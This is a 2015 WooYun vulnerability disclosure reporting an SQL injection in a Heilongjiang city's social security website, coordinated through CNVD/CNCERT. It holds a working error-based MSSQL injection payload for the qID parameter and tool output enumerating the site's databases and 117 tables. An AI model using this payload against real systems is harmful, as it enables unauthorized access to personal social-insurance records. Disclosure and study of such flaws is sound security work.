当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144988

漏洞标题:黑龙江某市人力资源和社会保障网存在SQL注射漏洞

相关厂商:黑龙江某市人力资源和社会保障网

漏洞作者: 毛毛虫

提交时间:2015-10-06 13:21

修复时间:2015-11-26 10:52

公开时间:2015-11-26 10:52

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-06: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

黑龙江省佳木斯市人力资源和社会保障网存在SQL注射漏洞!

详细说明:

1.漏洞URL

http://**.**.**.**/shebaokachaxun.asp


2.注入点
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Action=search_query&ID=&qID=98765'+(SELECT 'CNtZ' WHERE 1504=1504 A
ND 8115=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(107)+CHAR(113)+CHAR(113)+(S
ELECT (CASE WHEN (8115=8115) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(11
2)+CHAR(113)+CHAR(98)+CHAR(113))))+'
Vector: AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DE
LIMITER_STOP]'))
---
3.服务器信息
[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000

漏洞证明:

1.数据库(7个)
available databases [7]:
[*] HRSI
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
2.列举HRSI表,总共117张表
Database: HRSI
[117 tables]
+-----------------------------------+
| Business_Class |
| CompanyType |
| JY_CallBid |
| JY_Contract |
| JY_Customer |
| JY_GongQiu |
| JY_Job |
| JY_Sort |
| JY_bid |
| JY_order |
| JiaYin_Address |
| JiaYin_Admin |
| JiaYin_Ads |
| JiaYin_Announce |
| JiaYin_Article |
| JiaYin_Channel |
| JiaYin_ChengGuo |
| JiaYin_City_Area |
| JiaYin_Comment |
| JiaYin_Company |
| JiaYin_Company_Department |
| JiaYin_CreateFiles |
| JiaYin_CreateFiles_bak |
| JiaYin_Css |
| JiaYin_Document |
| JiaYin_Favorite |
| JiaYin_Friend |
| JiaYin_Guest |
| JiaYin_Js |
| JiaYin_Keyword |
| JiaYin_Label |
| JiaYin_LianTong_Service |
| JiaYin_LinkClass |
| JiaYin_LinkSite |
| JiaYin_Log_Admin |
| JiaYin_Log_Card_Buy |
| JiaYin_Log_Card_Transfer |
| JiaYin_Log_Consume |
| JiaYin_Log_Sqlin |
| JiaYin_Message |
| JiaYin_Module |
| JiaYin_Module_Method |
| JiaYin_Module_Method_updated |
| JiaYin_Movie |
| JiaYin_Movie_learn |
| JiaYin_Page |
| JiaYin_PeiXunJianDing |
| JiaYin_Photo |
| JiaYin_Product |
| JiaYin_Product_Categories |
| JiaYin_Products |
| JiaYin_Role |
| JiaYin_Role_Power |
| JiaYin_School |
| JiaYin_School_High_School_Class |
| JiaYin_School_Major |
| JiaYin_School_Plan |
| JiaYin_School_Query |
| JiaYin_School_Study_Level |
| JiaYin_School_Study_years |
| JiaYin_School_Subject |
| JiaYin_School_Willing |
| JiaYin_Server |
| JiaYin_SheBaoKaCaXun |
| JiaYin_ShenQing |
| JiaYin_Soft |
| JiaYin_Special |
| JiaYin_Style |
| JiaYin_StyleHelp |
| JiaYin_System |
| JiaYin_Teach_Learn_Note |
| JiaYin_Teach_Test |
| JiaYin_Teach_Test_Log |
| JiaYin_Telecom_Custom |
| JiaYin_Telecom_Device |
| JiaYin_Telecom_Node |
| JiaYin_Telecom_WorkFlow |
| JiaYin_Telecom_WorkLog |
| JiaYin_Template |
| JiaYin_UpFileLog |
| JiaYin_User |
| JiaYin_UserCz |
| JiaYin_UserGroup |
| JiaYin_User_Count |
| JiaYin_User_Edu |
| JiaYin_User_Online |
| JiaYin_User_ReadLog |
| JiaYin_Vote |
| JiaYin_Votes |
| JiaYin_YiQi |
| JiaYin_ZhuanJia |
| JiaYin_liuYan |
| JiaYin_report |
| JiaYin_user_Document |
| Jiayin_Product_Attribute |
| Jiayin_Product_Attribute_Category |
| Jiayin_Product_Attribute_Group |
| Jiayin_Product_Price |
| Jiayin_Product_TradeMark |
| Jiayin_Province |
| Jiayin_School_High_school |
| Jiayin_Teach_Group |
| Jiayin_Teach_Test_Paper |
| Jiayin_User_Category |
| Jiayin_city |
| Jiayin_school_Study_Topics |
| Product_Cart |
| dtproperties |
| jiayin_Class |
| jiayin_school_score_college |
| leAuditCollectAlerts |
| leAuditCollectConfigVars |
| leAuditCollectDatabases |
| leAuditCollectEventData |
| leAuditCollectNotification |
| sysconstraints |
| syssegments |
+-----------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 毛毛虫@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-12 10:51

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给黑龙江分中心,由其后续协调网站管理单位处置.同时通报给人社部信息中心。

最新状态:

暂无